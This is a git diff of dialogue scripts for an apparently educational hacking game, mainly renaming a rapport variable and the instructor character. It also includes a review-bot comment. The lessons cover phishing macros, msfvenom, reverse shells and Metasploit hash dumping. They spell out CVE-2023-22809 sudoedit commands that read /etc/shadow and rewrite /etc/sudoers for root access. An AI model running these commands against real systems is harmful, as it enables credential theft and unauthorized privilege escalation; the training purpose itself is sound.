@@ -451,7 +451,7 @@ Social Engineering Specialist: The choice depends on your target. Different role -> social_engineering_hub === attachment_targeting === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Matching attachments to targets—critical for success. @@ -467,13 +467,13 @@ Social Engineering Specialist: **General principle**: Send what the target expec Social Engineering Specialist: In this simulation, targets have preferences. Some will only open specific file types. Pay attention to their roles and feedback. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_attachment = true -> social_engineering_hub === macro_explanation === ~ macros_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Office macros. Powerful and frequently exploited. @@ -500,7 +500,7 @@ Social Engineering Specialist: Social engineering comes into play: "This documen -> social_engineering_hub === macro_creation === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Creating a malicious macro—walkthrough: @@ -524,12 +524,12 @@ Social Engineering Specialist: **Step 6**: Save as .odt or .ods. Attach to phish Social Engineering Specialist: When victim opens document and enables macros (or if their security is set to low), your payload executes. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_attachment = true -> social_engineering_hub === macro_defenses === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Macro defenses—layered approach: 
@@ -553,11 +553,11 @@ Social Engineering Specialist: The challenge: many organizations legitimately us Social Engineering Specialist: Defense-in-depth: combine technical controls, user awareness, and policy. No single measure is perfect. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === executable_payloads === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Executable malware payloads. More direct than macros. @@ -580,7 +580,7 @@ Social Engineering Specialist: Works better with technical targets who might exp -> social_engineering_hub === msfvenom_payloads === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: msfvenom. Metasploit Framework's payload generator. @@ -604,12 +604,12 @@ Social Engineering Specialist: When victim runs the malware, it connects back to Social Engineering Specialist: msfvenom can generate payloads for any platform, architecture, and access method. Incredibly versatile tool. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ completed_attachment = true -> social_engineering_hub === executable_disguises === -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 Social Engineering Specialist: Disguising executables—social engineering and technical tricks: @@ -625,7 +625,7 @@ Social Engineering Specialist: **Pretext engineering**: Convince target they nee Social Engineering Specialist: In practice, getting users to run raw executables is harder than macro documents. But with right pretext and target, it works. -~ instructor_rapport += 8 +~ haxolottle_rapport += 8 -> social_engineering_hub // =========================================== 
@@ -634,7 +634,7 @@ Social Engineering Specialist: In practice, getting users to run raw executables === reverse_shells_intro === ~ reverse_shells_discussed = true -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Reverse shells. The goal of attachment-based phishing. @@ -659,7 +659,7 @@ Social Engineering Specialist: Why reverse? Several advantages: -> social_engineering_hub === reverse_shell_mechanics === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Reverse shell mechanics—simple but elegant: @@ -683,11 +683,11 @@ From network monitoring, looks like victim initiated connection to external IP. Social Engineering Specialist: Tools like netcat, msfvenom payloads, custom scripts—all create reverse shell connections. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub === post_exploitation_basics === -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Post-exploitation. What you do after gaining access. @@ -712,7 +712,7 @@ Basic netcat shells are fragile—no TTY, limited interaction, easily disconnect Social Engineering Specialist: For this lab, simple shell is sufficient to read flags and demonstrate access. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 -> social_engineering_hub // =========================================== @@ -720,7 +720,7 @@ Social Engineering Specialist: For this lab, simple shell is sufficient to read // =========================================== === attack_workflow === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Complete attack workflow for this lab: @@ -767,7 +767,7 @@ Social Engineering Specialist: **Phase 6 - Objective**: // =========================================== === challenge_tips === -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 Social Engineering Specialist: Practical tips for the simulation: 
@@ -815,7 +815,7 @@ Social Engineering Specialist: **Troubleshooting**: === ethics_discussion === ~ ethics_discussed = true -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 Social Engineering Specialist: Critical topic. Ethical considerations. @@ -844,11 +844,11 @@ Social Engineering Specialist: **Professional responsibility**: Security profess ~ ethical_awareness_shown = true You: Clear on the ethics. Authorized testing, defensive purpose, professional responsibility. Social Engineering Specialist: Excellent. Remember that throughout your career. - ~ instructor_rapport += 15 + ~ haxolottle_rapport += 15 -> social_engineering_hub === ethical_hacking_discussion === -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 Social Engineering Specialist: "Ethical hacking" without authorization is a contradiction. @@ -866,11 +866,11 @@ Social Engineering Specialist: **Proper approach**: If you identify a vulnerabil Social Engineering Specialist: The distinction is consent. Authorized testing with consent is ethical. Unauthorized testing without consent is not—even with "good intentions." -~ instructor_rapport += 20 +~ haxolottle_rapport += 20 -> social_engineering_hub === pentest_process === -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 Social Engineering Specialist: Legitimate penetration testing process: @@ -902,7 +902,7 @@ Social Engineering Specialist: **Reporting**: Social Engineering Specialist: This structured, authorized, documented process is what makes penetration testing ethical and legal. Everything else is unauthorized hacking. -~ instructor_rapport += 15 +~ haxolottle_rapport += 15 -> social_engineering_hub // =========================================== 
@@ -939,7 +939,7 @@ Social Engineering Specialist: Remember: in the simulation, victims provide feed Social Engineering Specialist: This is iterative social engineering. First attempt might fail. Adjust and try again. That's realistic—real attackers iterate too. -{instructor_rapport >= 60: +{haxolottle_rapport >= 60: Social Engineering Specialist: You've demonstrated strong understanding and good ethical awareness. You're well-prepared for this exercise. } diff --git a/story_design/ink/game_scenarios/post_exploitation.ink b/story_design/ink/game_scenarios/post_exploitation.ink index 93b1fa1..28f209d 100644 --- a/story_design/ink/game_scenarios/post_exploitation.ink +++ b/story_design/ink/game_scenarios/post_exploitation.ink 
@@ -4,32 +4,32 @@ // License: CC BY-SA 4.0 // Global persistent state -VAR instructor_rapport = 0 +VAR haxolottle_rapport = 0 VAR post_exploit_mastery = 0 // External variables EXTERNAL player_name === start === -Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. +Haxolottle: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. -~ instructor_rapport = 0 +~ haxolottle_rapport = 0 ~ post_exploit_mastery = 0 -Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. +Haxolottle: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. -Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. +Haxolottle: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. -Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. +Haxolottle: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. -Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only. +Haxolottle: Remember: these are powerful techniques for authorized penetration testing and defensive security only. 
~ post_exploit_mastery += 10 -> post_exploit_hub === post_exploit_hub === -Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore? +Haxolottle: What aspect of post-exploitation would you like to explore? + [What is post-exploitation?] -> post_exploit_intro 
@@ -64,231 +64,231 @@ Advanced Tactics Instructor: What aspect of post-exploitation would you like to -> END === post_exploit_intro === -Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system. +Haxolottle: Post-exploitation is everything that happens after you successfully compromise a system. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. +Haxolottle: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. -Advanced Tactics Instructor: From there, you need to: +Haxolottle: From there, you need to: understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems. + [Why not just stop after getting shell access?] - Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator. + Haxolottle: Initial access is often limited. You might be running as a low-privilege user, not an administrator. - Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. + Haxolottle: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. - Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. + Haxolottle: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. 
- Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. + Haxolottle: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What determines what you can do post-exploitation?] - Advanced Tactics Instructor: Several factors determine your capabilities: + Haxolottle: Several factors determine your capabilities: - Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. + Haxolottle: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. - Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as? + Haxolottle: Second, the security context - what user account is the vulnerable software running as? - Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? + Haxolottle: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? - Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system. + Haxolottle: Finally, your skill at the command line and understanding of the operating system. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === shell_access === -Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system. +Haxolottle: Shell access means you have access to a command line interface on the target system. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. 
+Haxolottle: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. -Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. +Haxolottle: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. + [What can I do with shell access?] - Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system. + Haxolottle: With shell access, you can run almost any command-line program available on the system. - Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more. + Haxolottle: You can list files, read documents, run scripts, check system information, create new files, and much more. - Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as. + Haxolottle: However, you're limited by the permissions of whatever user account you're running as. - Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software. + Haxolottle: If you're a normal user, you can't access administrator-only files or install system-wide software. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What commands should I avoid?] - Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen. + Haxolottle: Avoid interactive programs that expect keyboard input and draw to the screen. - Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. + Haxolottle: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. 
- Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit. + Haxolottle: Avoid programs that run continuously until stopped, like "ping" without a count limit. - Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. + Haxolottle: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's the difference between shells on Windows and Linux?] - Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). + Haxolottle: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). - Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig + Haxolottle: Common Windows commands: dir, type, net user, whoami, ipconfig - Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) + Haxolottle: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) - Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). + Haxolottle: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === assessing_access === -Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have? +Haxolottle: The first question after exploitation is: what level of access do I have? -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has. 
+Haxolottle: You need to determine what user account you're running as and what privileges that account has. -Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. +Haxolottle: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. + [How do I check my access level on Linux?] - Advanced Tactics Instructor: Use these commands to assess your Linux access: + Haxolottle: Use these commands to assess your Linux access: - Advanced Tactics Instructor: whoami - Shows your username + Haxolottle: whoami - Shows your username - Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups + Haxolottle: id - Shows your user ID (UID), group ID (GID), and groups - Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root! + Haxolottle: id -u - Shows just the UID. A UID of 0 means you're root! - Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying. + Haxolottle: Any other UID means you're a normal user with standard access controls applying. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I check my access level on Windows?] - Advanced Tactics Instructor: On Windows, you can use: + Haxolottle: On Windows, you can use: - Advanced Tactics Instructor: whoami - Shows your username and domain + Haxolottle: whoami - Shows your username and domain - Advanced Tactics Instructor: whoami /priv - Shows your privileges + Haxolottle: whoami /priv - Shows your privileges - Advanced Tactics Instructor: net user USERNAME - Shows details about a user account + Haxolottle: net user USERNAME - Shows details about a user account - Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information. 
+ Haxolottle: If you have Meterpreter: getuid and getprivs give detailed privilege information. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if I don't have root or Administrator access?] - Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons. + Haxolottle: That's very common! Most services run as unprivileged users for security reasons. - Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data. + Haxolottle: You can still access files that user can read, which might include sensitive data. - Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities. + Haxolottle: You can gather system information to look for privilege escalation opportunities. - Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. + Haxolottle: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. - Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities. + Haxolottle: Then you'll want to look for privilege escalation vulnerabilities. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === info_gathering === -Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. +Haxolottle: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users. +Haxolottle: You want to learn about the operating system, installed software, network configuration, running processes, and other users. + [What system information should I gather on Linux?] 
- Advanced Tactics Instructor: Key commands for Linux information gathering: + Haxolottle: Key commands for Linux information gathering: - Advanced Tactics Instructor: uname -a (kernel version and architecture) + Haxolottle: uname -a (kernel version and architecture) - Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details) + Haxolottle: cat /proc/cpuinfo (CPU details) - Advanced Tactics Instructor: free -h (memory usage) + Haxolottle: free -h (memory usage) - Advanced Tactics Instructor: df -h (disk usage and partitions) + Haxolottle: df -h (disk usage and partitions) - Advanced Tactics Instructor: env (environment variables) + Haxolottle: env (environment variables) - Advanced Tactics Instructor: cat /etc/passwd (list of user accounts) + Haxolottle: cat /etc/passwd (list of user accounts) - Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors. + Haxolottle: This information helps you understand the target and identify potential attack vectors. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Why check the sudo version?] - Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges. + Haxolottle: The sudo command allows users to run commands with elevated privileges. - Advanced Tactics Instructor: Check the version with: sudo --version + Haxolottle: Check the version with: sudo --version - Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! + Haxolottle: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! - Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. + Haxolottle: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. - Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation. 
+ Haxolottle: Finding a vulnerable sudo version is a goldmine for privilege escalation. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What network information is useful?] - Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach: + Haxolottle: Network information reveals what other systems you might be able to reach: - Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses) + Haxolottle: ifconfig or ip a (network interfaces and IP addresses) - Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports) + Haxolottle: netstat -an or ss -an (active connections and listening ports) - Advanced Tactics Instructor: route or ip route (routing table) + Haxolottle: route or ip route (routing table) - Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration) + Haxolottle: cat /etc/resolv.conf (DNS configuration) - Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore. + Haxolottle: This helps you identify other systems to pivot to or internal networks to explore. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === privilege_escalation === -Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted. +Haxolottle: Privilege escalation means gaining additional privileges you weren't intentionally granted. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. +Haxolottle: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. 
-Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. +Haxolottle: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. + [What are common privilege escalation vectors?] - Advanced Tactics Instructor: Common privilege escalation opportunities include: + Haxolottle: Common privilege escalation opportunities include: - Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits + Haxolottle: Vulnerable kernel versions with known local exploits - Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services + Haxolottle: Vulnerable system software like sudo, polkit, or services - Advanced Tactics Instructor: Misconfigured SUID binaries on Linux + Haxolottle: Misconfigured SUID binaries on Linux - Advanced Tactics Instructor: Weak file permissions on sensitive files + Haxolottle: Weak file permissions on sensitive files - Advanced Tactics Instructor: Scheduled tasks running as administrators + Haxolottle: Scheduled tasks running as administrators - Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats + Haxolottle: Credentials stored in plaintext or easily crackable formats - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I find privilege escalation opportunities?] 
- Advanced Tactics Instructor: Systematic enumeration is key: + Haxolottle: Systematic enumeration is key: - Advanced Tactics Instructor: Check kernel and software versions against CVE databases + Haxolottle: Check kernel and software versions against CVE databases - Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null + Haxolottle: Look for SUID binaries: find / -perm -4000 2>/dev/null - Advanced Tactics Instructor: Check sudo permissions: sudo -l + Haxolottle: Check sudo permissions: sudo -l - Advanced Tactics Instructor: Look for world-writable files in sensitive directories + Haxolottle: Look for world-writable files in sensitive directories - Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables + Haxolottle: Check for credentials in config files, bash history, and environment variables - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tell me about the sudo vulnerability] -> sudo_vulnerability 
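Review bot: the rapport counter is renamed on every increment in this hunk (`~ instructor_rapport += 5` becomes `~ haxolottle_rapport += 5`), but the `VAR` declaration that defines it and any host-side code that reads the old name are outside the visible region; if either still says `instructor_rapport`, inklecate will reject the file for an undeclared variable, or the game will read a variable that no longer exists, so please confirm both were updated in this commit. A small content point in the same hunk: `Look for SUID binaries: find / -perm -4000 2>/dev/null` lists only SUID files; SGID binaries are an equally common escalation path, and `find / -perm /6000 -type f 2>/dev/null` covers both, which would fit the "systematic enumeration" framing better.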
@@ -296,610 +296,610 @@ Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in th - -> post_exploit_hub === sudo_vulnerability === -Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. +Haxolottle: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges. +Haxolottle: The vulnerability is in sudoedit, which allows editing files with elevated privileges. -Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. +Haxolottle: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. + [How does this vulnerability work?] - Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable. + Haxolottle: The vulnerability exploits how sudoedit processes the EDITOR environment variable. - Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. + Haxolottle: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. - Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + Haxolottle: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts - Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! + Haxolottle: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! - Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. 
+ Haxolottle: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How can I use this to escalate privileges?] - Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + Haxolottle: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts - Advanced Tactics Instructor: This gives you password hashes which you might crack offline. + Haxolottle: This gives you password hashes which you might crack offline. - Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + Haxolottle: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts - Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL + Haxolottle: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL - Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i + Haxolottle: This allows your user to run any command as root without a password: sudo -i - Advanced Tactics Instructor: Now you're root! + Haxolottle: Now you're root! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's tricky about exploiting this?] - Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well. + Haxolottle: The challenge is that your simple shell doesn't support full interactive programs well. - Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. + Haxolottle: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. 
- Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback: + Haxolottle: You need to carefully use vim commands without visual feedback: "G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save. - Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! + Haxolottle: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === msf_post_modules === -Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. +Haxolottle: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence. +Haxolottle: These modules run against established sessions to collect data, escalate privileges, or set up persistence. -Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more. +Haxolottle: They're categorized by operating system and function: gather, escalate, manage, recon, and more. + [How do I use post-exploitation modules?] - Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z. + Haxolottle: First, you need an active session. Background it with Ctrl-Z. 
- Advanced Tactics Instructor: Check your session ID: sessions + Haxolottle: Check your session ID: sessions - Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm + Haxolottle: Select a post module: use post/linux/gather/checkvm - Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID) + Haxolottle: Set the session: setg SESSION 1 (or your session ID) - Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module. + Haxolottle: Using "setg" sets it globally, so you don't have to set it for each module. - Advanced Tactics Instructor: Run the module: exploit (or run) + Haxolottle: Run the module: exploit (or run) - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What useful post-exploitation modules exist?] - Advanced Tactics Instructor: For Linux targets, valuable modules include: + Haxolottle: For Linux targets, valuable modules include: - Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM + Haxolottle: post/linux/gather/checkvm - Detect if running in a VM - Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files + Haxolottle: post/linux/gather/enum_configs - Download config files - Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration + Haxolottle: post/linux/gather/enum_network - Network configuration - Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information + Haxolottle: post/linux/gather/enum_system - System and software information - Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs + Haxolottle: post/linux/gather/enum_users_history - Command history and logs - Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes + Haxolottle: post/linux/gather/hashdump - Dump password hashes - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Where does collected 
information get stored?] - Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database. + Haxolottle: Post-exploitation modules store collected data as "loot" in Metasploit's database. - Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/ + Haxolottle: The module output tells you where files are saved, usually in ~/.msf4/loot/ - Advanced Tactics Instructor: You can view loot with: loot + Haxolottle: You can view loot with: loot - Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing. + Haxolottle: Files are timestamped and categorized, making it easy to review later for report writing. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === meterpreter_intro === -Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). +Haxolottle: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. +Haxolottle: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. -Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. +Haxolottle: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. + [What makes Meterpreter special?] 
- Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells: + Haxolottle: Meterpreter has numerous advantages over basic shells: - Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder + Haxolottle: Runs entirely in memory - doesn't write to disk, making forensics harder - Advanced Tactics Instructor: Encrypted communications by default + Haxolottle: Encrypted communications by default - Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations + Haxolottle: Rich command set for file browsing, process manipulation, network operations - Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence + Haxolottle: Can migrate between processes to hide or achieve persistence - Advanced Tactics Instructor: Extensible with post-exploitation modules + Haxolottle: Extensible with post-exploitation modules - Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture + Haxolottle: Includes "spyware" features like keylogging and screen capture - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use Meterpreter commands?] 
